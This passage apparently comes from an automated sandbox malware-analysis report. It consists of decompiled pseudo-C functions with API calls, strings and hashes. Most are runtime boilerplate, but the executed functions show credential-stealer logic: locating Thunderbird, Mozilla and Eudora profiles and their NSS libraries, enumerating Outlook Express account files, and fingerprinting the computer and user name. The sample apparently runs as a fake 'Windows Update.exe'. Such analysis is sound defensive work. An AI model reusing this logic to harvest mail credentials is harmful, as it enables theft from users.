                                                                                              • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t2;
                                                                                              				void* _t3;
                                                                                              				void* _t4;
                                                                                              				intOrPtr _t9;
                                                                                              				void* _t11;
                                                                                              				void* _t20;
                                                                                              				void* _t21;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				void* _t27;
                                                                                              				void* _t29;
                                                                                              				void* _t31;
                                                                                              				void* _t32;
                                                                                              				long _t36;
                                                                                              				long _t37;
                                                                                              				void* _t40;
                                                                                              
                                                                                              				_t29 = __edx;
                                                                                              				_t23 = __ecx;
                                                                                              				_t20 = __ebx;
                                                                                              				_t36 = GetLastError();
                                                                                              				_t2 =  *0x412064; // 0xffffffff
                                                                                              				_t42 = _t2 - 0xffffffff;
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					L2:
                                                                                              					_t3 = E00403ECE(_t23, 1, 0x364);
                                                                                              					_t31 = _t3;
                                                                                              					_pop(_t25);
                                                                                              					if(_t31 != 0) {
                                                                                              						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                                                                              						__eflags = _t4;
                                                                                              						if(_t4 != 0) {
                                                                                              							E00404192(_t25, _t31, 0x4132a4);
                                                                                              							E00403E03(0);
                                                                                              							_t40 = _t40 + 0xc;
                                                                                              							__eflags = _t31;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								goto L8;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_push(_t31);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t3);
                                                                                              						L4:
                                                                                              						E00403E03();
                                                                                              						_pop(_t25);
                                                                                              						L9:
                                                                                              						SetLastError(_t36);
                                                                                              						E00403E8B(_t20, _t29, _t31, _t36);
                                                                                              						asm("int3");
                                                                                              						_push(_t20);
                                                                                              						_push(_t36);
                                                                                              						_push(_t31);
                                                                                              						_t37 = GetLastError();
                                                                                              						_t21 = 0;
                                                                                              						_t9 =  *0x412064; // 0xffffffff
                                                                                              						_t45 = _t9 - 0xffffffff;
                                                                                              						if(_t9 == 0xffffffff) {
                                                                                              							L12:
                                                                                              							_t32 = E00403ECE(_t25, 1, 0x364);
                                                                                              							_pop(_t27);
                                                                                              							if(_t32 != 0) {
                                                                                              								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                                                                              								__eflags = _t11;
                                                                                              								if(_t11 != 0) {
                                                                                              									E00404192(_t27, _t32, 0x4132a4);
                                                                                              									E00403E03(_t21);
                                                                                              									__eflags = _t32;
                                                                                              									if(_t32 != 0) {
                                                                                              										goto L19;
                                                                                              									} else {
                                                                                              										goto L18;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_push(_t32);
                                                                                              									goto L14;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_push(_t21);
                                                                                              								L14:
                                                                                              								E00403E03();
                                                                                              								L18:
                                                                                              								SetLastError(_t37);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t32 = E00405878(_t25, _t45, _t9);
                                                                                              							if(_t32 != 0) {
                                                                                              								L19:
                                                                                              								SetLastError(_t37);
                                                                                              								_t21 = _t32;
                                                                                              							} else {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						}
                                                                                              						return _t21;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t31 = E00405878(_t23, _t42, _t2);
                                                                                              					if(_t31 != 0) {
                                                                                              						L8:
                                                                                              						SetLastError(_t36);
                                                                                              						return _t31;
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                                              • _abort.LIBCMT ref: 0040439E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 88804580-0
                                                                                              • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                                              • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004025BA() {
                                                                                              				void* _t4;
                                                                                              				void* _t8;
                                                                                              
                                                                                              				E00402AE5();
                                                                                              				E00402A79();
                                                                                              				if(E004027D9() != 0) {
                                                                                              					_t4 = E0040278B(_t8, __eflags);
                                                                                              					__eflags = _t4;
                                                                                              					if(_t4 != 0) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						E00402815();
                                                                                              						goto L1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                                                • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                                              • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E00402E79(intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				void* _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr* _t35;
                                                                                              				struct HINSTANCE__* _t36;
                                                                                              				struct HINSTANCE__* _t42;
                                                                                              				intOrPtr* _t43;
                                                                                              				intOrPtr* _t44;
                                                                                              				WCHAR* _t48;
                                                                                              				struct HINSTANCE__* _t49;
                                                                                              				struct HINSTANCE__* _t53;
                                                                                              				intOrPtr* _t56;
                                                                                              				struct HINSTANCE__* _t61;
                                                                                              				intOrPtr _t62;
                                                                                              
                                                                                              				if(_a4 == 2 || _a4 == 1) {
                                                                                              					GetModuleFileNameW(0, 0x412bf8, 0x104);
                                                                                              					_t48 =  *0x412e7c; // 0x761c5a
                                                                                              					 *0x412e80 = 0x412bf8;
                                                                                              					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                              						_t48 = 0x412bf8;
                                                                                              					}
                                                                                              					_v8 = 0;
                                                                                              					_v16 = 0;
                                                                                              					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
                                                                                              					_t61 = E0040311E(_v8, _v16, 2);
                                                                                              					if(_t61 != 0) {
                                                                                              						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                              						if(_a4 != 1) {
                                                                                              							_v12 = 0;
                                                                                              							_push( &_v12);
                                                                                              							_t49 = E00404D5E(_t61);
                                                                                              							if(_t49 == 0) {
                                                                                              								_t56 = _v12;
                                                                                              								_t53 = 0;
                                                                                              								_t35 = _t56;
                                                                                              								if( *_t56 == 0) {
                                                                                              									L15:
                                                                                              									_t36 = 0;
                                                                                              									 *0x412e6c = _t53;
                                                                                              									_v12 = 0;
                                                                                              									_t49 = 0;
                                                                                              									 *0x412e74 = _t56;
                                                                                              									L16:
                                                                                              									E00403E03(_t36);
                                                                                              									_v12 = 0;
                                                                                              									goto L17;
                                                                                              								} else {
                                                                                              									goto L14;
                                                                                              								}
                                                                                              								do {
                                                                                              									L14:
                                                                                              									_t35 = _t35 + 4;
                                                                                              									_t53 =  &(_t53->i);
                                                                                              								} while ( *_t35 != 0);
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							_t36 = _v12;
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						 *0x412e6c = _v8 - 1;
                                                                                              						_t42 = _t61;
                                                                                              						_t61 = 0;
                                                                                              						 *0x412e74 = _t42;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t43 = E00404831();
                                                                                              						_push(0xc);
                                                                                              						_pop(0);
                                                                                              						 *_t43 = 0;
                                                                                              						L10:
                                                                                              						_t49 = 0;
                                                                                              						L17:
                                                                                              						E00403E03(_t61);
                                                                                              						return _t49;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t44 = E00404831();
                                                                                              					_t62 = 0x16;
                                                                                              					 *_t44 = _t62;
                                                                                              					E00404639();
                                                                                              					return _t62;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windows Update.exe,00000104), ref: 00402EB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Windows Update.exe$pOv
                                                                                              • API String ID: 514040917-3232758402
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040724C(signed int _a4) {
                                                                                              				char _v5;
                                                                                              				char _v6;
                                                                                              				char _v7;
                                                                                              				char _v8;
                                                                                              				char _v9;
                                                                                              				char _v10;
                                                                                              				char _v11;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				char _v16;
                                                                                              				char _v17;
                                                                                              				char _v18;
                                                                                              				char _v19;
                                                                                              				void _v20;
                                                                                              				long _v24;
                                                                                              				int _v28;
                                                                                              				int _v32;
                                                                                              				void* _v36;
                                                                                              				void _v291;
                                                                                              				char _v292;
                                                                                              				void _v547;
                                                                                              				char _v548;
                                                                                              				void _v1058;
                                                                                              				short _v1060;
                                                                                              				void _v1570;
                                                                                              				short _v1572;
                                                                                              				int _t88;
                                                                                              				signed int _t91;
                                                                                              				signed int _t92;
                                                                                              				signed int _t94;
                                                                                              				signed int _t96;
                                                                                              				signed int _t99;
                                                                                              				signed int _t104;
                                                                                              				signed short* _t110;
                                                                                              				void* _t113;
                                                                                              				void* _t114;
                                                                                              
                                                                                              				_t92 = 0;
                                                                                              				_v20 = 0xa3;
                                                                                              				_v19 = 0x1e;
                                                                                              				_v18 = 0xf3;
                                                                                              				_v17 = 0x69;
                                                                                              				_v16 = 7;
                                                                                              				_v15 = 0x62;
                                                                                              				_v14 = 0xd9;
                                                                                              				_v13 = 0x1f;
                                                                                              				_v12 = 0x1e;
                                                                                              				_v11 = 0xe9;
                                                                                              				_v10 = 0x35;
                                                                                              				_v9 = 0x7d;
                                                                                              				_v8 = 0x4f;
                                                                                              				_v7 = 0xd2;
                                                                                              				_v6 = 0x7d;
                                                                                              				_v5 = 0x48;
                                                                                              				_v292 = 0;
                                                                                              				memset( &_v291, 0, 0xff);
                                                                                              				_v548 = 0;
                                                                                              				memset( &_v547, 0, 0xff);
                                                                                              				_v1572 = 0;
                                                                                              				memset( &_v1570, 0, 0x1fe);
                                                                                              				_v1060 = 0;
                                                                                              				memset( &_v1058, 0, 0x1fe);
                                                                                              				_v36 = _a4 + 4;
                                                                                              				_a4 = 0;
                                                                                              				_v24 = 0xff;
                                                                                              				GetComputerNameA( &_v292,  &_v24); // executed
                                                                                              				_v24 = 0xff;
                                                                                              				GetUserNameA( &_v548,  &_v24); // executed
                                                                                              				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                              				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                              				_v32 = strlen( &_v292);
                                                                                              				_t88 = strlen( &_v548);
                                                                                              				_t113 = _v36;
                                                                                              				_v28 = _t88;
                                                                                              				memcpy(_t113,  &_v20, 0x10);
                                                                                              				_t91 = 0xba0da71d;
                                                                                              				if(_v28 > 0) {
                                                                                              					_t110 =  &_v1060;
                                                                                              					do {
                                                                                              						_t104 = _a4 & 0x80000003;
                                                                                              						if(_t104 < 0) {
                                                                                              							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                                              						}
                                                                                              						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                                              						_t91 = _t91 * 0xbc8f;
                                                                                              						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                                              						_a4 = _a4 + 1;
                                                                                              						_t110 =  &(_t110[1]);
                                                                                              					} while (_a4 < _v28);
                                                                                              				}
                                                                                              				if(_v32 > _t92) {
                                                                                              					do {
                                                                                              						_t99 = _a4 & 0x80000003;
                                                                                              						if(_t99 < 0) {
                                                                                              							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                                              						}
                                                                                              						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                                              						_t91 = _t91 * 0xbc8f;
                                                                                              						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                                              						_a4 = _a4 + 1;
                                                                                              						_t92 = _t92 + 1;
                                                                                              					} while (_t92 < _v32);
                                                                                              				}
                                                                                              				return _t91;
                                                                                              			}


                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004072AE
                                                                                              • memset.MSVCRT ref: 004072C2
                                                                                              • memset.MSVCRT ref: 004072DC
                                                                                              • memset.MSVCRT ref: 004072F1
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                              • strlen.MSVCRT ref: 00407364
                                                                                              • strlen.MSVCRT ref: 00407373
                                                                                              • memcpy.MSVCRT ref: 00407385
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                              • API String ID: 1832431107-3760989150
                                                                                              • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                              • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                              • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                              • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406EC3(void** __eax) {
                                                                                              				void* __esi;
                                                                                              				void* _t15;
                                                                                              				int _t16;
                                                                                              				int _t17;
                                                                                              				void* _t26;
                                                                                              				void** _t38;
                                                                                              				void** _t40;
                                                                                              				void* _t45;
                                                                                              
                                                                                              				_t40 = __eax;
                                                                                              				_t15 =  *__eax;
                                                                                              				if(_t15 != 0xffffffff) {
                                                                                              					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                                                              					 *(_t45 + 4) = _t16;
                                                                                              					if(_t16 != 0) {
                                                                                              						goto L5;
                                                                                              					} else {
                                                                                              						E00406F5B(_t40);
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                                                              					 *_t40 = _t26;
                                                                                              					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                                                              					L4:
                                                                                              					if( *(_t45 + 4) != 0) {
                                                                                              						L5:
                                                                                              						_t38 =  &(_t40[0xa2]);
                                                                                              						_t28 =  &(_t40[0x5d]);
                                                                                              						_t41 =  &(_t40[0xf3]);
                                                                                              						_t17 = strlen( &(_t40[0xf3]));
                                                                                              						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                                                              							 *_t38 = 0;
                                                                                              						} else {
                                                                                              							E004062AD(_t38, _t41, _t28);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return  *(_t45 + 4);
                                                                                              			}


                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                              • strlen.MSVCRT ref: 00406F27
                                                                                              • strlen.MSVCRT ref: 00406F2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                              • String ID: rA
                                                                                              • API String ID: 379999529-474049127
                                                                                              • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                              • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                              • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                              • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E00401E8B(void* __eflags, char* _a4) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				void _v275;
                                                                                              				char _v276;
                                                                                              				void _v539;
                                                                                              				char _v540;
                                                                                              				void _v795;
                                                                                              				char _v796;
                                                                                              				void _v1059;
                                                                                              				char _v1060;
                                                                                              				void _v1323;
                                                                                              				char _v1324;
                                                                                              				void _v2347;
                                                                                              				char _v2348;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				int _t65;
                                                                                              				char* _t69;
                                                                                              				char _t70;
                                                                                              				int _t71;
                                                                                              				char _t75;
                                                                                              				void* _t76;
                                                                                              				long _t78;
                                                                                              				void* _t83;
                                                                                              				int _t85;
                                                                                              				void* _t87;
                                                                                              				int _t104;
                                                                                              				int _t108;
                                                                                              				char _t126;
                                                                                              				void* _t137;
                                                                                              				void* _t139;
                                                                                              				char* _t157;
                                                                                              				char* _t158;
                                                                                              				char* _t160;
                                                                                              				int _t161;
                                                                                              				void* _t164;
                                                                                              				CHAR* _t169;
                                                                                              				char* _t170;
                                                                                              				void* _t171;
                                                                                              				void* _t172;
                                                                                              				void* _t173;
                                                                                              				void* _t174;
                                                                                              				void* _t175;
                                                                                              
                                                                                              				_v540 = 0;
                                                                                              				memset( &_v539, 0, 0x104);
                                                                                              				_t164 = 0x1a;
                                                                                              				E0040EE59( &_v540, _t164); // executed
                                                                                              				_t65 = strlen("Mozilla\\Profiles");
                                                                                              				_t6 = strlen( &_v540) + 1; // 0x1
                                                                                              				_t172 = _t171 + 0x14;
                                                                                              				if(_t65 + _t6 >= 0x104) {
                                                                                              					_t69 = _a4;
                                                                                              					 *_t69 = 0;
                                                                                              					_t157 = _t69;
                                                                                              				} else {
                                                                                              					_t157 = _a4;
                                                                                              					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
                                                                                              				}
                                                                                              				_t70 = E0040614B(_t157);
                                                                                              				if(_t70 == 0) {
                                                                                              					 *_t157 = _t70;
                                                                                              				}
                                                                                              				_t158 = _t157 + 0x105;
                                                                                              				_t71 = strlen("Thunderbird\\Profiles");
                                                                                              				_t12 = strlen( &_v540) + 1; // 0x1
                                                                                              				if(_t71 + _t12 >= 0x104) {
                                                                                              					 *_t158 = 0;
                                                                                              				} else {
                                                                                              					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
                                                                                              				}
                                                                                              				_t75 = E0040614B(_t158);
                                                                                              				_pop(_t137);
                                                                                              				if(_t75 == 0) {
                                                                                              					 *_t158 = _t75;
                                                                                              				}
                                                                                              				_t160 = _a4 + 0x20a;
                                                                                              				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                                                              				_t173 = _t172 + 0xc;
                                                                                              				if(_t76 == 0) {
                                                                                              					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
                                                                                              					_t173 = _t173 + 0xc;
                                                                                              					if(_t126 == 0) {
                                                                                              						 *_t160 = _t126;
                                                                                              					}
                                                                                              				}
                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                              				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                                                              				_t174 = _t173 + 0xc;
                                                                                              				if(_t78 != 0) {
                                                                                              					L32:
                                                                                              					_t169 = _a4 + 0x30f;
                                                                                              					if( *_t169 != 0) {
                                                                                              						L35:
                                                                                              						return _t78;
                                                                                              					}
                                                                                              					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                                                              					_t78 = E0040614B(_t169);
                                                                                              					if(_t78 != 0) {
                                                                                              						goto L35;
                                                                                              					}
                                                                                              					 *_t169 = _t78;
                                                                                              					return _t78;
                                                                                              				} else {
                                                                                              					_v796 = _t78;
                                                                                              					_t161 = 0;
                                                                                              					memset( &_v795, 0, 0xff);
                                                                                              					_v12 = 0;
                                                                                              					_t83 = E0040EC05(_v8, 0,  &_v796);
                                                                                              					_t175 = _t174 + 0x18;
                                                                                              					if(_t83 != 0) {
                                                                                              						L31:
                                                                                              						_t78 = RegCloseKey(_v8);
                                                                                              						goto L32;
                                                                                              					}
                                                                                              					_t170 = "sqlite3.dll";
                                                                                              					do {
                                                                                              						_t85 = atoi( &_v796);
                                                                                              						_pop(_t139);
                                                                                              						if(_t85 < 3) {
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						_v2348 = 0;
                                                                                              						memset( &_v2347, _t161, 0x3ff);
                                                                                              						_v276 = 0;
                                                                                              						memset( &_v275, _t161, 0x104);
                                                                                              						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                                                              						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                                                              						_t175 = _t175 + 0x38;
                                                                                              						if(_v276 != 0 && E0040614B( &_v276) != 0) {
                                                                                              							_v1060 = 0;
                                                                                              							memset( &_v1059, _t161, 0x104);
                                                                                              							_v1324 = 0;
                                                                                              							memset( &_v1323, _t161, 0x104);
                                                                                              							_t104 = strlen(_t170);
                                                                                              							_t41 = strlen( &_v276) + 1; // 0x1
                                                                                              							_t175 = _t175 + 0x20;
                                                                                              							if(_t104 + _t41 >= 0x104) {
                                                                                              								_v1060 = 0;
                                                                                              							} else {
                                                                                              								E004062AD( &_v1060,  &_v276, _t170);
                                                                                              							}
                                                                                              							_t108 = strlen("nss3.dll");
                                                                                              							_t47 = strlen( &_v276) + 1; // 0x1
                                                                                              							if(_t108 + _t47 >= 0x104) {
                                                                                              								_v1324 = 0;
                                                                                              							} else {
                                                                                              								E004062AD( &_v1324,  &_v276, "nss3.dll");
                                                                                              							}
                                                                                              							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                                                                                              								_t161 = 0;
                                                                                              								goto L28;
                                                                                              							} else {
                                                                                              								strcpy(_a4 + 0x30f,  &_v276);
                                                                                              								goto L31;
                                                                                              							}
                                                                                              						}
                                                                                              						L28:
                                                                                              						_v12 = _v12 + 1;
                                                                                              						_t87 = E0040EC05(_v8, _v12,  &_v796);
                                                                                              						_t175 = _t175 + 0xc;
                                                                                              					} while (_t87 == 0);
                                                                                              					goto L31;
                                                                                              				}
                                                                                              			}















































                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00401EAD
                                                                                              • strlen.MSVCRT ref: 00401EC6
                                                                                              • strlen.MSVCRT ref: 00401ED4
                                                                                              • strlen.MSVCRT ref: 00401F1A
                                                                                              • strlen.MSVCRT ref: 00401F28
                                                                                              • memset.MSVCRT ref: 00401FD3
                                                                                              • atoi.MSVCRT ref: 00402002
                                                                                              • memset.MSVCRT ref: 00402025
                                                                                              • sprintf.MSVCRT ref: 00402052
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • memset.MSVCRT ref: 004020A8
                                                                                              • memset.MSVCRT ref: 004020BD
                                                                                              • strlen.MSVCRT ref: 004020C3
                                                                                              • strlen.MSVCRT ref: 004020D1
                                                                                              • strlen.MSVCRT ref: 00402104
                                                                                              • strlen.MSVCRT ref: 00402112
                                                                                              • memset.MSVCRT ref: 0040203A
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 2492260235-4223776976
                                                                                              • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                              • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                              • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                              • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                              				char* _v8;
